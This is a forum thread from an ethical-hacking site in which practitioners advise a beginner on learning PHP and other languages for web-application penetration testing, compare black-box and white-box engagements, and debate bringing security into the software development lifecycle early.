to be a professional web-application pentester?

Viewing 21 reply threads
  • Author
    Posts
    • #5455
      mesho
      Participant

      hello guys,

      in order to be a professional penetration tester for web application i know that i must learn HTML, JavaScript, PHP, ..etc

      for PHP is the PHP manual on php.net sufficient or i should pick a book to learn the language very well and program with it?

      because i really hate programming in PHP.
      but i’m insist to be a professional in discovering/exploiting PHP Bugs such as:
      SQL Injection / Remote File Inclusion / Path Disclosure, and a lot more.

      thanks,

    • #34447
      caissyd
      Participant

      Do you already know another programing language VERY WELL? If it is the case, understanding PHP should be enough. But if this is your first language, I suggest your learn Java or C# first. They are more structured and you will learn to code “properly”. PHP will be very easy after one of these two. Again, this is only if you don’t have much programing experience.

      Add CSS, XML, XML Schema, SOAP (including WSDL), Java and C# to this list!

    • #34448
      mesho
      Participant

      i already know the basics of C, so i think shifting to other languages will be easy but my question is that is it enough for pen-tester to read the manual of a language like PHP from the main PHP site, or he need to buy some books and hard-coded with PHP in order to find vulnerabilities inside PHP web application.

      in brief, if i want to penetrate a PHP Web application do i need to be an expert programmer on PHP or reading manual and know how things work will get the job done?

    • #34449
      morpheus063
      Participant

      Well personally speaking, I suggest having some level of hands-on programming experience with PHP really helps when you compare it with just reading the manuals and understanding the concepts.

      There is a “real” difference in doing things and reading things 🙂

    • #34450
      caissyd
      Participant

      @mesho, when you do a web app pentest for a client that has a PHP based web site, it depends if you are doing a black box or a white box test.

      With a black box test, you are basically coming from the internet with no knowledge of the application. You will only know that PHP is used by looking at the framework from the outside. But you won’t see PHP code.

      The white box test gives you access to everything, including the source code. So a quality pentest/vulnerability analysis requires you to audit the source code. You have to understand PHP pretty well in order to do that…

      I hope this answer your questions

    • #34451
      mesho
      Participant

      thanks guys for your answers,

      i think to learn most-used web application languages from books and try to master it will be really pain for a penetration tester that’s why I’m asking if the online material (manuals) for a specific language will be sufficient in order to audit the source code for that language. of course if that person already a programmer!

      so what do you think fellows?

    • #34452
      caissyd
      Participant

      I personally like to write an “Hello World” program then I follow a book to learn the basic stuff.  After 5-7 chapters in a book, I go back coding my own stuff. Once I hit a wall, I google to find my answers.

      Basically, the important thing is to learn. So if a book is your thing, go for it. If you prefer videos (I do!) then do that. But if you prefer trials/errors, it isn’t bad either as long as you learn from “nice” code.

      For PHP, I propose you download a PHP framework and start reading the code in it. Try to follow the trace of a login from HTML/CSS to PHP and SQL. Usually, framework code is well written. If you don’t understand something, Google is your friend!  😉

    • #34453
      sil
      Participant

      My two cents on this… Focus on “the core.” Web application is more than LAMP (Linux Apache MySQL PHP). What will end up happening is, you will focus furiously on PHP and that’s all you’ll be good at testing. What happens when you move into an AJAX environment? Most large companies use SOAP/AJAX/etc., more than they use LAMP set-ups. LAMP setups from my experience tend to be the lower hanging fruit often used by companies with limited to no budget. E.g., name me one financial company using a LAMP environment for their infrastructure. One insurance company. Etc.,

      If you *choose* to learn PHP, unless you want to become a PHP programmer, learn the basics of PHP SECURITY related material (the core of what you need, how it works). Same goes for AJAX. You’d need to set out to be an expert Java programmer, expert XML programmer to truly understand it however, this doesn’t stop you from learning the core.

      So if you’re going to do this professionally, go with where the money is. AJAX. Otherwise, one could look back to say Perl when “Mason” was “the next big thing” or Python, Ruby, etc., as for blackbox/whitebox, I’ll add another another two cents… Aim for a blackbox test.

      In a whitebox test, you WILL run into staff that assume a security assessment/audit/pentest is being done and WILL lay blame: “That pentester will cost me my job!” and they’ll end up trying to defend against you. This gives them a false sense of security since they’ll implement measures against you, while missing the overall point.

      If you HAVE TO or the client CHOOSES to have a whitebox/crystal/grey/etc., then you’d want to work with the admins to let them know exactly what you’re going to do, and you’re not there to pull punches but solely show what an attacker can potentially do.

    • #34454
      hayabusa
      Participant

      sil’s comment about requesting a blackbox test is one that I rely on, a LOT.  I find that, many times, if the IT / security staff are aware of the testing, then they throw up protections that aren’t normally there, or ‘start’ reviewing logs more closely, when the idea of pentests is to clearly show areas, not only in system security, but often times, in security ‘posture’ as well. 

      While there’s not necessarily a need to ‘point out’ that XYZ person doesn’t watch the logs closely, in your report (and you could assure XYZ you wouldn’t do that, IF you were asked / forced to do whitebox, etc,) you could use it as a way of promoting add-on products or services to the environment, that could make XYZ’s job easier, such as something like Novell’s Sentinel Log Manager, or various other products, which help to perform the tasks AND show a cost / time savings that benefits the company, and would allow XYZ to work on other projects to better the security posture.  This way, you’ve shown them value, both in noting that things could otherwise have gone overlooked, as well as providing them with an alternative solution, which could yield you more work down the road, because you’ve shown you truly WANT to better them, not just spend your time doing more ‘auditing’ type work, etc.

      Goes a long way towards your viability, in your customers’ eyes.

      Now, there’s absolutely no reason NOT to accept the other types of engagements (whitebox, etc,) as he noted, if they’re relevant, or if that’s the true request from the folks engaging your services. 

      Also, as sil and others said, you don’t have to be a guru programmer in any given programming / web application language.  In fact, if you understand the basic principles and concepts behind what each does, and have SOME knowledge to work from, then you can go a long way in web-app pentesting.  Just get comfortable with the basics of many of the languages, to where you’re content to dig up example code (and understand it) if needed, during your projects and learning.  And yes, as sil pointed out, AJAX is the  ‘big boy on the block’ right now, so it definitely wouldn’t hurt to spend more time in the Java / XML realm, etc., if you’ve got it.  And SOAP is right there with it, from the environments I’ve dealt with.

      On the flip side, if you want to become a pentesting tool developer, knowing how to code in Ruby and Python goes a long way, as well, as many of the frameworks and such are written in those languages.  But even then, you MUST have understanding of the other languages, or writing exploits in Ruby or Python still isn’t going to be an easy task…

    • #34455
      caissyd
      Participant

      @sil and @hayabusa: I guess we have different clients. I am more and more involved BEFORE a new web application is released. Developers and team leads that I work with are happy to see me arrive. Most of the time, they say: “I know nothing about security, can you teach me how you find these things?”. It’s not really a pentest, but it is in a way.

      I start right after they are done coding and I do all my stuff during the testing phase. The more stuff I find, the happier the developpers because they know they won’t get busted once the app is in prod. But I am careful not to stress their clients…

      All that to say, I do about 50% of vulnerability assessments, 30% of “security through SDLC” and 20% pentest of existing web apps.

      And I have a fraction of the experience sil and hayabusa have!!!  😉

    • #34456
      hayabusa
      Participant

      @H1tM0nk3y – I bet you sell yourself short on that experience thing!  (Maybe not, as I don’t personally know you, but just saying…)  I follow your thoughts on this, and from your perspective, I see why you feel that way.  Heck, if my clients and situations were the same, I’d very likely have given similar advice and perspective on this.  ;D

      I also think that, for me anyway, I learn much the same as you (I prefer to learn through experience, with my own coding and lots practice, as I read, rather than simply following through an entire book / course, first.  I get to a point where I understand enough to start jumping in more head first, and go for it.  …and I also love video training!)  So believe me when I say, we’re not THAT different.  In fact, when I said ‘sil and others’, I was putting some of what you said in, by inference, as well.

    • #34457
      caissyd
      Participant

      @hayabusa – The fact that we spend so much time on EthicalHacker.net means we are not that different!  😉

    • #34458
      mesho
      Participant

      thanks all for the great explanations,  😉

    • #34459
      hayabusa
      Participant

      @H1t M0nk3y wrote:

      @hayabusa – The fact that we spend so much time on EthicalHacker.net means we are not that different!  😉

      No doubt!  Well, in my case, anyway, it helps that in my primary job, I work from a VOP (home) office, and while doing my day-to-day, I often just leave EH-Net running in the background, and glance at it, on my second screen, periodically, to see if anything new / ‘interesting to me’ has been posted.

      That, and the primary folks here understand and think as we do, so it certainly makes for more enlightening conversations throughout the day!  (Not the “Same ol’, same ol'”  😛 )

    • #34460
      sil
      Participant

      @H1tM0nk3y – when the availability is possible to stick around at a client for the full development life-cycle of a product, then I’m all for it however I’ll quote: “Would you rather push out the next release or spend time patching the current one?” (Rev. Bill Blunden – The Rootkit Arsenal).

      Companies don’t care to spend on Fortify, Klocwork, beStorm, etc., and even if they did, the developers most of the times won’t get it and even if they *do* get it, they’re often under tight deadlines to push out the “next release.”

      There are plenty of instances that I can quote to prove a point but I’ll choose one; the talk of the town right now. Tavis Ormandy’s Help Center disclosure (http://seclists.org/fulldisclosure/2010/Jun/205) To be outright blunt, many people have failed to look at the reality of it all, they don’t care to, it doesn’t mean anything to them, they’d rather point the finger for their own issues than fix them:

      hcp:// has been broken a few times over the years, for example:

      http://seclists.org/bugtraq/2002/Aug/225, Delete arbitrary files using Help and Support Center
      http://www.microsoft.com/technet/security/bulletin/ms03-044.mspx, HCP memory corruption by Dave Litchfield.

      How can a company keep making the same repetitive mistakes. It’s pure negligence and it shows the lack of investment in security in the SDLC. So it’s one thing (wishful thinking) to have the luxury of implementing security controls at the development phase (phase 2 of the SDLC) and its completely another implementing it in the initiation phase (phase 1 of the SDLC) (ref: http://csrc.nist.gov/groups/SMA/sdlc/index.html). As it stands right now, the practicality of coming in as a pentester from the ground up (phase 1) would be a waste of time. At phase 2 it would be a waste of time in fact, until it’s a product, it’s a waste of time. This does not mean a company should have its workers tapping away at the keyboards releasing whatever it is their producing “right here right now”, then coming back after it’s deployed to find holes.

      At the initiation phase, programmers, project managers, etc., need to think outside of the frameworks and step into reality:

      Current reality
      PM: “We’re making a program that will allow people to chat with each other”
      Developer: “We can make it transfer files and send icons!”
      PM: “We have two months to get this done”

      Ideal reality:
      PM: “We’re making a program that will allow people to chat with each other”
      Developer: “We can make it transfer files and send icons however we need to be careful as to avoid having people spoof, inject code”
      Other Developer with Security Experience: “Definitely… We need to test the code along the way with protocol fuzzers, application fault injection programs, etc., to make sure no one steals or subverts the application”
      PM: “You’re right, the last thing we need is a corporation being compromised because we didn’t check. We could look like fools and lose $N amount of money”
      PM: “Other_Developer, work with Developers to make sure we put out a rock solid program. We have two months to get it done and I want further testing even after it’s released”

      If you’re the “corporate pentester” then it will work for you however, doing contract work (hired gun pentesting) you’re better off as a company paying to train your developers to understand security. Getting it before it even goes into the mainstream. It’s more cost-effective to fork out say 10,000.00 to pay for your programmers to take courses at places like Immunity, Dino Dai Zovi’s courses, Alex Sotirov’s courses where your developers will come out understanding “security risk” from the programmers point of view, than it is to fork out millions in “patching the current one.”

      But alas, reality is what reality is and companies would rather spend money on deflection – marketing away security holes (http://www.sophos.com/blogs/gc/g/2010/06/15/tavis-ormandy-pleased-website-exploits-microsoft-zeroday/) – than they would on training. Companies have it backwards and don’t care to change this stance (marketing versus training versus implementing security). It’s much easier and cost effective to spend a couple of thousand in damage control than it is to put out clean code. At the end of the day, blame the consumer though, for continuously buying buggy software and thinking that “they’re seeing history” is good news.

      Microsoft has never in its history released 14 patches on a single patch Tuesday, making August 10th, somewhat of a non celebratory record.
      http://www.coated.com/microsoft-patch-tuesday-patches/

    • #34461
      caissyd
      Participant

      As it stands right now, the practicality of coming in as a pentester from the ground up (phase 1) would be a waste of time. At phase 2 it would be a waste of time in fact, until it’s a product, it’s a waste of time.

      @sil – I disagree with this. Maybe because I was a developer and especially, an application architect before, but there is an enormous bonus of having a security guy involved at the early stage of the development of a system.

      I agree you can’t do a pentest while reading business requirements, but at the very begining of a project, you can help the Project Manager setting a preliminary budget for security. Is the project about exchanging money between 2 big banks or is it a static web intranet site displaying non sensitive data? Even with only the Project Charter, you can for example tell a PM to put money aside to hire 3 full time security specialists or just have the security team test the application before it gets released.

      Also, the solution architect and the application architect are setting up the web app framework at the beginning of the development process. Business Analysts are writting test cases before developers start developing.

      Also, I often train developers BEFORE they start coding on project specific components. For example, if the team has never implemented SOAP requests between 2 systems, I will:

      1) First work with the architect so he can securely set up the framework
      2) Then I will train the developers on implementing the solution properly
      3) I will help the testers write proper test scripts and test cases
      4) Once a module (or even a prototype!) is ready, I will go on an fuzz it, etc. This help me find security problems early in the game so they don’t reproduce it many times.
      5) At the end of the development, I make sure a vulnerability assessment is done, I review the code, I make sure all test sripts passed, I check the overall solution, etc.

      So to me, getting involved at an early stage of project is the key in meeting the project deadline and in implementing good security. In addition, the developers get better and better at this.

      What do you guys think?

    • #34462
      hayabusa
      Participant

      I personally think it’s a matter of opinion, and perspective from which the discussion comes.  I can certainly see, if you’re employed with a company as a security professional, the benefit of proactive analysis and assistance in setting things up.  IF your management understands that role and appreciates it, as well, then all the better. 

      On the flip side, if you’re an outsider, as sil and I are, then I most certainly wouldn’t want to be involved that early, as it leaves the potential for the insiders to lay blame, or to say something was known early on, and used outside of scope, etc.

      So it just depends on the situation, in my eyes.  I see both sides, and understand both points of view.  I think your thinking, H1tM0nk3y, is valid, for your circumstances, and I think sil’s is, for his.

      My 2 cents, anyway…

    • #34463
      sil
      Participant

      @H1t M0nk3y wrote:

      you can help the Project Manager setting a preliminary budget for security.

      This in itself is and will always be an issue. We (administrators, engineers, architects) ask for me and when it comes to security, there is only fuzzy math you can use to justify the need for more money. Ever hear a discussion on the ROI of say a firewall. There is no ROI. Ask yourself this question, what is the ROI for the lock you put on your car. The ROI for the alarm you have on your car. What you’re left with is “insurance” not a definitive slash sensible numeric value to go by. YOU can say “well I paid 40k for my car” while your insurance company can say “well it’s worth 18k” while Edmonds or Carfax can say its worth 30k. What you have are just opinions. What is your car worth to you? Would it be safe to say that your car is worth its price and the cost of your salary if you couldn’t drive yourself to work?

      @H1t M0nk3y wrote:

      Is the project about exchanging money between 2 big banks or is it a static web intranet site displaying non sensitive data? Even with only the Project Charter, you can for example tell a PM to put money aside to hire 3 full time security specialists or just have the security team test the application before it gets released.

      This is the failure: “have the security team test the application before it gets released” What about having the guidelines beforehand and testing it all throughout the development phase. For example, phase1: “It sends IM’s, make sure no tainting (fault injection) can be done… During phase two, programmer goes through his code checking for buggy code, buggy calls (malloc, strcpy, etc). All the way throughout the phase ESPECIALLY during the initiation phase it needs to be done. Many pentesters aren’t programmers and many programmers aren’t pentesters. At the end of the day, the initial coding team will understand how a process works, why it does what it does. They need to be more vigilant about calls, procedures, etc. You don’t wait until pre-release to test it otherwise what you may end up doing is having to go back through ALL of the code. On some systems this is extremely time consuming and we know in business, time is money.

      @H1t M0nk3y wrote:

      1) First work with the architect so he can securely set up the framework
      2) Then I will train the developers on implementing the solution properly
      3) I will help the testers write proper test scripts and test cases
      4) Once a module (or even a prototype!) is ready, I will go on an fuzz it, etc. This help me find security problems early in the game so they don’t reproduce it many times.
      5) At the end of the development, I make sure a vulnerability assessment is done, I review the code, I make sure all test sripts passed, I check the overall solution, etc.

      This is great for new applications but for existing applications it makes little difference as stated before, do you think they’d rather focus on the new release or spend money on an old and buggy one.

      @H1t M0nk3y wrote:

      So to me, getting involved at an early stage of project is the key in meeting the project deadline and in implementing good security. In addition, the developers get better and better at this.

      We’re in complete agreement here about beginning as early on as possible however, the subject for this thread is “to be a professional web-application pentester?” not “to be a professional web-application security coder?” 😉

      As a pentester, I don’t really care if someone followed the SDLC. This is of little importance to me in fact, I hope they DIDN’T follow any SDLC as it makes my job a heck of a lot easier. As a “secure web application developer” this is quite a completely different story. If I had to play an “application security researcher” then its again, another story. However, risk analysis trumps all of these arguments from both me and you. For example, if whatever application we’re talking about resides behind say a private network, do you (as a company) want to spend *that* much money worrying about someone potentially running perl -e ‘print “%80x. :x40;’ locally (remember I said its in a private network). The answer is low so a manager will minimize this risk often accepting it.

      PM: “The odds of this happening are phenomenally low”
      SecurityProfessional: “The reality is, if a client side exploit hit the machine its vulnerable”
      PM: “What MS/Apple/etc., do with their security is one thing. We can’t worry about OUR security because of their INSECURITY”

      Ad-nauseum … It’s a nice methodology to want to follow however, most companies are driven by “right here right now… get it done!” where security is a secondary concern (if even that). So it’s not that I disagree with you, I don’t agree that this is a “pentester’s” role per se. At least not in regards to the initial post.

      Lastly, NO NO NO I don’t mean to sound rude/argumentative, in fact, I’m just in a thinkative state 😉 Before someone says… “what an ass”

    • #34464
      hayabusa
      Participant

      And sil does have a point… this thread was instantiated with the subject of pentester in mind, so to that end, I’ll say, touche’ sil.  😉

      This was a very insightful thread, and again, as sil stated in his, we definitely ALL agree, that the earlier you can get involved, the better.  It’s a matter of what your role is, and how you’ve been tasked / requested to perform it.

    • #34465
      caissyd
      Participant

      Ok, I agree with you guys. “pentest” was the topic of this thread, but the focus was “learning PHP”!  😉

      I really like this site!  ;D

    • #34466
      hayabusa
      Participant

        Always enlightening for us all!

    • #34467
      T_Bone
      Participant

      Well this is certainly an intense discussion and one of which I have thoroughly enjoyed reading. 

      @Sil – This is my favourite comment of the whole discussion being a Junior pen tester myself :):

      “As a pentester, I don’t really care if someone followed the SDLC. This is of little importance to me in fact, I hope they DIDN’T follow any SDLC as it makes my job a heck of a lot easier”

Viewing 21 reply threads
  • You must be logged in to reply to this topic.

Copyright ©2021 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?